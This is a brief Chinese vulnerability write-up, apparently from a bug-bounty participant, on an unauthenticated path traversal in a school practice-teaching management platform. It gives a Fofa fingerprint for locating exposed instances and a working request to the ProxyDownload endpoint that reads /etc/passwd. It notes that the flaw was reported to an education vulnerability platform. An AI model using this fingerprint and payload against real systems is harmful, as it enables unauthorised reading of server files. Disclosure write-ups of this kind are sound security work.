//相关敏感信息已经经过脱敏处理
之前学到的一个洞,整理一下笔记,学校的实践教学管理平台可能会用这个
指纹
Fofa**:body=”aexp/ValidateImage”**
只能测绘到公网资产,很多学校的这些系统都是开放在内网,需要vpn的
但是这个漏洞利用不需要登录到管理平台的账户,在登录框页面就可以直接打
页面截图:

POC/EXP
/aexp/ProxyDownload?path=/speedec/webapps/webftp/../../../../etc/passwd
复现示例如下图:

返回了 /etc/passwd 的内容,验证漏洞存在且成功利用
src收录情况
交了一个 edu 的收录了,中危
